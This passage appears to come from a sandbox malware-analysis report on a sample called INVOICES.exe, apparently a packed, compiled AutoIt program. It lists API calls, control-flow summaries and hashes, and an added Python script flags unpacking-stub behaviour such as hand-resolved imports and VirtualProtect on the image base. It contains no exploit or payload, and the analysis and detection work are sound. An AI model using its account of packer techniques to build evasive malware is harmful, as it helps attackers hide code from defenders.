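Run it as `python au3_rsrc.py INVOICES.exe` to check a sample on disk; the name comparison is case-insensitive because FindResourceExW compares resource names that way. The resource body is only the container the runtime reads, so a positive AU3 header means "compiled AutoIt", not that the embedded script is decoded.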

Control-flow Graph

• Graph rendered in the report (node list not reproduced). Function entry 734afe; basic blocks cover 734afe-734c93 plus an out-of-line region 76dac0-76dbed. API-bearing blocks: 734afe GetVersionExW (with calls to 7377c7 and 737d2c), 734bf1 GetCurrentProcess and IsWow64Process, 734c41 GetNativeSystemInfo, 734c4d FreeLibrary, 734c7d and 734c89 GetSystemInfo. Internal calls: 737e8c and 737886 (from 734b73), 734c95 (from 734c20 and 734c32).
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00734B2B
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,007BFAEC,00000000,00000000,?), ref: 00734BF8
                                                                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 00734BFF
                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00734C45
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00734C50
                                                                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00734C81
                                                                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00734C8D
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1986165174-0
                                                                                                                                  • Opcode ID: 718b219a1ef248ca2aab8fe391ea4b83d7384c599046546eb6a8e5b5f6d345fb
                                                                                                                                  • Instruction ID: d0378b6d5a143e70c84bb15e81b0496a5d4b9fd53e4e4bd7085630ced41bb15f
                                                                                                                                  • Opcode Fuzzy Hash: 718b219a1ef248ca2aab8fe391ea4b83d7384c599046546eb6a8e5b5f6d345fb
                                                                                                                                  • Instruction Fuzzy Hash: 6291E87194A7C4DED735CB7884515AAFFE5AF26300F488E9DD4CB93A42D228F908C729

Control-flow Graph

• Graph rendered in the report (node list not reproduced). Function entry 85ca00; basic blocks cover 85ca00-85cbda, the first half (85ca00-85cb1e) being many small blocks without API calls. 85cb2a LoadLibraryA and 85cb53 GetProcAddress sit inside a loop (85cb24 → 85cb2a → 85cb41 → back to 85cb24, with 85cb48 → 85cb53 → 85cb62 → 85cb41 as the inner step); 85cb69 ExitProcess is reached only from the GetProcAddress block. After the loop a second small loop (85cb75 ↔ 85cb7e-85cb9e) precedes 85cba0-85cbd0, which calls VirtualProtect twice, followed by a self-looping block 85cbd4-85cbd8 and the exit 85cbda.
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 0085CB3A
                                                                                                                                  • GetProcAddress.KERNEL32(?,00855FF9), ref: 0085CB58
                                                                                                                                  • ExitProcess.KERNEL32(?,00855FF9), ref: 0085CB69
                                                                                                                                  • VirtualProtect.KERNELBASE(00730000,00001000,00000004,?,00000000), ref: 0085CBB7
                                                                                                                                  • VirtualProtect.KERNELBASE(00730000,00001000), ref: 0085CBCC
Memory Dump Source
• Source File: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1996367037-0
                                                                                                                                  • Opcode ID: 68ab86c1c9273b9cedd6c1b009a3a5adae2731b48e99488a77a32f7967de7ea3
                                                                                                                                  • Instruction ID: cec8bf40550e13df4019a029019fd9019ffa7e54b656384544f3d7d2e3f0d6b4
                                                                                                                                  • Opcode Fuzzy Hash: 68ab86c1c9273b9cedd6c1b009a3a5adae2731b48e99488a77a32f7967de7ea3
                                                                                                                                  • Instruction Fuzzy Hash: CB51F4B2A4432A4FD722CA78DCC06607B91FB413667280738DDE2C73C5E7A0580E8BA1
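The API list above has the shape of an unpacking stub: LoadLibraryA and GetProcAddress resolve imports by hand, a failed lookup leads to ExitProcess, and VirtualProtect then makes the first page at 00730000 (the image base given as Offset in the dump source) writable (00000004 = PAGE_READWRITE) and restores it afterwards, which is what a stub does when it rewrites the loaded PE header or import table after placing the real code in memory. As an added example, not part of the Joe Sandbox report, the following parses API lines in exactly the format printed here and flags that combination; the sample input is the five API lines and the Source File line of this block, and the protection constants are the Win32 PAGE_* values. The second VirtualProtect shows only two arguments in the report, so it is not flagged, which is the expected result for the restoring call.

```python
import re
from dataclasses import dataclass

# Grammar of the report lines above, e.g.
#   "• VirtualProtect.KERNELBASE(00730000,00001000,00000004,?,00000000), ref: 0085CBB7"
#   "• CreatePopupMenu.USER32 ref: 0073373E"            (no argument list at all)
_CALL = re.compile(r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
_OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
_HEX = re.compile(r"^[0-9A-Fa-f]{8}$")

# Win32 page protections that make a page writable: PAGE_READWRITE, PAGE_WRITECOPY,
# PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY.
WRITABLE = {0x04, 0x08, 0x40, 0x80}


@dataclass
class Call:
    api: str
    module: str
    args: list   # int for an 8-digit hex value, None for "?", str for anything else
    ref: int     # call-site address


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if _HEX.match(tok) else tok


def parse_report(lines):
    """Return (image_base, [Call]) from 'APIs' and 'Memory Dump Source' lines of a report."""
    base, calls = None, []
    for line in lines:
        m = _OFFSET.search(line)
        if m:
            base = int(m.group(1), 16)
            continue
        m = _CALL.search(line)
        if m:
            api, module, argstr, ref = m.groups()
            args = [parse_arg(a) for a in argstr.split(",")] if argstr else []
            calls.append(Call(api, module, args, int(ref, 16)))
    return base, calls


def header_rewrites(calls, image_base):
    """VirtualProtect calls that make the first page of the loaded image writable.
    Ordinary code never needs its own PE header writable; an unpacking stub does,
    to patch the header or import table after dropping the real code into memory."""
    hits = []
    for c in calls:
        if c.api != "VirtualProtect" or len(c.args) < 3:
            continue
        addr, _size, prot = c.args[:3]
        if addr == image_base and prot in WRITABLE:
            hits.append(c)
    return hits


def resolves_imports_by_hand(calls):
    """LoadLibrary plus GetProcAddress in one function: the code builds its own import table."""
    apis = {c.api for c in calls}
    return bool(apis & {"LoadLibraryA", "LoadLibraryW"}) and "GetProcAddress" in apis


# Constructed input: the lines of this block of the report, as the sandbox prints them.
SAMPLE = """\
• LoadLibraryA.KERNEL32(?), ref: 0085CB3A
• GetProcAddress.KERNEL32(?,00855FF9), ref: 0085CB58
• ExitProcess.KERNEL32(?,00855FF9), ref: 0085CB69
• VirtualProtect.KERNELBASE(00730000,00001000,00000004,?,00000000), ref: 0085CBB7
• VirtualProtect.KERNELBASE(00730000,00001000), ref: 0085CBCC
• Source File: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
""".splitlines()


def analyse(lines=SAMPLE):
    base, calls = parse_report(lines)
    return {
        "image_base": base,
        "header_rewrites": [hex(c.ref) for c in header_rewrites(calls, base)],
        "manual_imports": resolves_imports_by_hand(calls),
        "exit_on_failure": any(c.api == "ExitProcess" for c in calls),
    }


if __name__ == "__main__":
    print(analyse())
```

The check is deliberately narrow: it only fires when the address argument is literally the image base and the protection is visible, so a VirtualProtect on a heap buffer or on a page whose protection the report shows as "?" is not reported. Paste the API lines of any other function from this page into SAMPLE to compare; the window-procedure and resource-loader functions above produce no hits.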
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,0076E6F1), ref: 007944AB
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 007944BC
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 007944CC
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: fc9edaf2b44ec5e4ab54139f53209fb8a7a34054a3d3e8c450b5dc3401948bda
• Instruction ID: 77b9512d74ddc0e4e5e9f337b6e886ce9e2c83855a7e0f504092a660d13b01bc
• Opcode Fuzzy Hash: fc9edaf2b44ec5e4ab54139f53209fb8a7a34054a3d3e8c450b5dc3401948bda
• Instruction Fuzzy Hash: 4DE0D831810400574A10A738FC0DDED779CAE05335F108715F935C20E0E77C69108699
Strings
• Variable must be of type 'Object'., xrefs: 007741BB
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
• Opcode ID: 901b216027ad2c46c2f3185421b0da08695a27d2d79695a9b0977d799598ef95
• Instruction ID: 4d8434b2bb32c21c265fa3a0daacbdd38730c3b026c618f74d23f30452fa9fca
• Opcode Fuzzy Hash: 901b216027ad2c46c2f3185421b0da08695a27d2d79695a9b0977d799598ef95
• Instruction Fuzzy Hash: 47A27F75A00215CFEF24CF58C484AAEB7B1FF58310F648069E946AB392D779ED42CB91
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00740BBB
• timeGetTime.WINMM ref: 00740E76
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00740FB3
• Sleep.KERNEL32(0000000A), ref: 00740FC1
• LockWindowUpdate.USER32(00000000,?,?), ref: 0074105A
• DestroyWindow.USER32 ref: 00741066
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00741080
• Sleep.KERNEL32(0000000A,?,?), ref: 007751DC
• TranslateMessage.USER32(?), ref: 00775FB9
• DispatchMessageW.USER32(?), ref: 00775FC7
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00775FDB
Similarity
• API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
• String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 4212290369-3242690629
• Opcode ID: 65d5f5b3779ae568995e3b802184097f99f764d1e736d22c61cf73f5db7313a7
• Instruction ID: f2b808fd8f95060324ba629b318edfdcdceb15faa73858687135ec5691121d34
• Opcode Fuzzy Hash: 65d5f5b3779ae568995e3b802184097f99f764d1e736d22c61cf73f5db7313a7
• Instruction Fuzzy Hash: F4B2D470608741DFDB24DF24C889BAAB7E5BF84344F14891DF589972A1DBBDE844CB82
Control-flow Graph
APIs
  • Part of subcall function 00799008: __time64.LIBCMT ref: 00799012
  • Part of subcall function 00735045: _fseek.LIBCMT ref: 0073505D
• __wsplitpath.LIBCMT ref: 007992DD
  • Part of subcall function 0075426E: __wsplitpath_helper.LIBCMT ref: 007542AE
• _wcscpy.LIBCMT ref: 007992F0
• _wcscat.LIBCMT ref: 00799303
• __wsplitpath.LIBCMT ref: 00799328
• _wcscat.LIBCMT ref: 0079933E
• _wcscat.LIBCMT ref: 00799351
  • Part of subcall function 0079904E: _memmove.LIBCMT ref: 00799087
  • Part of subcall function 0079904E: _memmove.LIBCMT ref: 00799096
• _wcscmp.LIBCMT ref: 00799298
  • Part of subcall function 007997DD: _wcscmp.LIBCMT ref: 007998CD
  • Part of subcall function 007997DD: _wcscmp.LIBCMT ref: 007998E0
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007994FB
• _wcsncpy.LIBCMT ref: 0079956E
• DeleteFileW.KERNEL32(?,?), ref: 007995A4
• CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007995BA
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007995CB
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007995DD
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
• Opcode ID: 5784052dc12c5d2f4923ba39024f8641b6ad3097efab06c0b6803e531ea164cb
• Instruction ID: 4a54ea939de790438e72d7c469afcde0eb29846334356a1dd112af247384093b
• Opcode Fuzzy Hash: 5784052dc12c5d2f4923ba39024f8641b6ad3097efab06c0b6803e531ea164cb
• Instruction Fuzzy Hash: 23C16CB1E00219AADF21DFA5DC85EDFB7BDEF44300F0040AAF609E6151DB789A848F65
Control-flow Graph
APIs
  • Part of subcall function 00734864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007F52F8,?,007337C0,?), ref: 00734882
  • Part of subcall function 0075068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007372C5), ref: 007506AD
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00737308
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0076EC21
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0076EC62
• RegCloseKey.ADVAPI32(?), ref: 0076ECA0
• _wcscat.LIBCMT ref: 0076ECF9
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: 35f17f623d2a21202cb50dfb02399ed70d6e2447bf904581971281720097f2f9
• Instruction ID: 70b2f5f739227af1642516392582dcd89f505c5533d6f8e33e5ecba809df0535
• Opcode Fuzzy Hash: 35f17f623d2a21202cb50dfb02399ed70d6e2447bf904581971281720097f2f9
• Instruction Fuzzy Hash: 117180B1509301DED314EF29DC459ABBBF8FF98310F40852EF445831A1EB789949CBA6
Control-flow Graph
APIs
• GetSysColorBrush.USER32(0000000F), ref: 00733A62
• LoadCursorW.USER32(00000000,00007F00), ref: 00733A71
• LoadIconW.USER32(00000063), ref: 00733A88
• LoadIconW.USER32(000000A4), ref: 00733A9A
• LoadIconW.USER32(000000A2), ref: 00733AAC
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00733AD2
• RegisterClassExW.USER32(?), ref: 00733B28
  • Part of subcall function 00733041: GetSysColorBrush.USER32(0000000F), ref: 00733074
  • Part of subcall function 00733041: RegisterClassExW.USER32(00000030), ref: 0073309E
  • Part of subcall function 00733041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007330AF
  • Part of subcall function 00733041: LoadIconW.USER32(000000A9), ref: 007330F2
Similarity
• API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
• String ID: #$0$AutoIt v3
• API String ID: 2880975755-4155596026
• Opcode ID: 5aed88df040dfb040e22c4fd9187126b3aff8e36a8367df294225ab61ddfa93f
• Instruction ID: cee0591991bf3ec7c783e63c2679e8bd72f98969525f43a227784f3545709ead
• Opcode Fuzzy Hash: 5aed88df040dfb040e22c4fd9187126b3aff8e36a8367df294225ab61ddfa93f
• Instruction Fuzzy Hash: 11212DB1D10704AFEB10DFA4EC09BAD7FB5FB08725F108269F604A62A1D7B95650CF98
Control-flow Graph
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                                  • API String ID: 1825951767-3513169116
                                                                                                                                  • Opcode ID: 775727034bc8434c225fc3247bb805c00da4491739ad10731813532a091d1bd3
                                                                                                                                  • Instruction ID: 03252242458cef314e86de7e69b243a2f0e24b299b5ce4dc1efb20ecf50f8ed1
                                                                                                                                  • Opcode Fuzzy Hash: 775727034bc8434c225fc3247bb805c00da4491739ad10731813532a091d1bd3
                                                                                                                                  • Instruction Fuzzy Hash: BDA15EB291021DDAEB14EBA0CC99EEEB778BF14300F444529F516B7192DF7C6A09CB61

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00733074
• RegisterClassExW.USER32(00000030), ref: 0073309E
• RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007330AF
• LoadIconW.USER32(000000A9), ref: 007330F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Register$BrushClassClipboardColorFormatIconLoad
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 975902462-1005189915
• Opcode ID: 9c7373f8c01fc1c00b9fee54784fac13a42742eceb33bb3cf7ec8d78173079a0
• Instruction ID: 2751efc662387ef1551fd48e2cf87c420744a3fd581036aa213cdd207593c617
• Opcode Fuzzy Hash: 9c7373f8c01fc1c00b9fee54784fac13a42742eceb33bb3cf7ec8d78173079a0
• Instruction Fuzzy Hash: 60313AB1941709AFDB109FA4DC88BEDBBF4FB09710F14826AE690E62A0D7B94541CF94

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00733074
• RegisterClassExW.USER32(00000030), ref: 0073309E
• RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007330AF
• LoadIconW.USER32(000000A9), ref: 007330F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Register$BrushClassClipboardColorFormatIconLoad
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 975902462-1005189915
• Opcode ID: 2acf3671d7f7d23660ab7ba297e48101cbfa73437cbc763b3dcf686aac4155f6
• Instruction ID: d69d749a4a4edd458731d491deb017ac037f5e4aa45c50f6bdea9b7b13775d51
• Opcode Fuzzy Hash: 2acf3671d7f7d23660ab7ba297e48101cbfa73437cbc763b3dcf686aac4155f6
• Instruction Fuzzy Hash: D021C9B1911618AFDB00DF94EC49BDDBBF4FB08B50F10822AF610A62A0D7B94544CF99

Control-flow Graph (graph image not captured; legend: Executed / Not Executed; basic blocks 9425d0-9428d2 calling CreateFileW, VirtualAlloc, ReadFile, VirtualFree, CloseHandle)

APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 009426A1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009428C7
Memory Dump Source
• Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
• Instruction ID: 598dc633a38dc6bf5faa5bd0d5dfafca08c25f65db517b985d8d0caf3b6f4afb
• Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
• Instruction Fuzzy Hash: F6A10774E00209EBDB14CFA4C994FEEBBB5BF48304F208559E501BB280D779AA81DB54

Control-flow Graph (graph image not captured; legend: Executed / Not Executed; single basic block 7339e7-733a57 calling CreateWindowExW twice and ShowWindow twice)

APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00733A15
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733A36
• ShowWindow.USER32(00000000,?,?), ref: 00733A4A
• ShowWindow.USER32(00000000,?,?), ref: 00733A53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 2e628192487c3c7d6f6ed3fcfc30e1711d6b5f9e2c13c302230a6e8c5b7c2a91
• Instruction ID: 909e2f28a68e0054fcf7565d0fa8ca7cfba62df7b2a89e1879bf737220f7417e
• Opcode Fuzzy Hash: 2e628192487c3c7d6f6ed3fcfc30e1711d6b5f9e2c13c302230a6e8c5b7c2a91
• Instruction Fuzzy Hash: 98F030B05006907EEA305717AC0CF772F7DE7C7F60B018229FA00A2170C5691800CA78

Control-flow Graph (graph image not captured; legend: Executed / Not Executed; basic blocks 9423b0-942589 calling CreateFileW, VirtualAlloc, ReadFile, ExitProcess)

APIs
  • Part of subcall function 009422A0: Sleep.KERNELBASE(000001F4), ref: 009422B1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009424C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: F1W1P7FKY3UGOZ5HT
• API String ID: 2694422964-3223746154
• Opcode ID: 41c2f837232bdeaf9940e434202af63d471d7bcc6ea5630cfdc0816fad100f72
• Instruction ID: fa3ee22df1454785301b3bce7deb51802dc3968d4b5fe8b1f801eec1f7f7a193
• Opcode Fuzzy Hash: 41c2f837232bdeaf9940e434202af63d471d7bcc6ea5630cfdc0816fad100f72
• Instruction Fuzzy Hash: 2D518F30D04249DBEF15DBA4C854BEEBB78AF59304F004199F608BB2C0D7B91B49CBA5

Control-flow Graph (graph image not captured; legend: Executed / Not Executed; basic blocks 7369ca-76e611, internal calls only)

APIs
  • Part of subcall function 00734F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734F6F
• _free.LIBCMT ref: 0076E5BC
• _free.LIBCMT ref: 0076E603
  • Part of subcall function 00736BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00736D0D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                  • API String ID: 2861923089-1757145024
                                                                                                                                  • Opcode ID: 3e9b68bca64e6c801a7a115459c04d451d2900741056f43fa7f687b150f43c71
                                                                                                                                  • Instruction ID: 7da8afae95ca3cb982f6125f74e1be5c3085294332714208f657ed91ef1fd55f
                                                                                                                                  • Opcode Fuzzy Hash: 3e9b68bca64e6c801a7a115459c04d451d2900741056f43fa7f687b150f43c71
                                                                                                                                  • Instruction Fuzzy Hash: 99918171910259EFDF14EFA4CC559EDBBB4FF08314F148429F816AB292EB38A915CB60
APIs
  • Part of subcall function 007502E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00750313
  • Part of subcall function 007502E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 0075031B
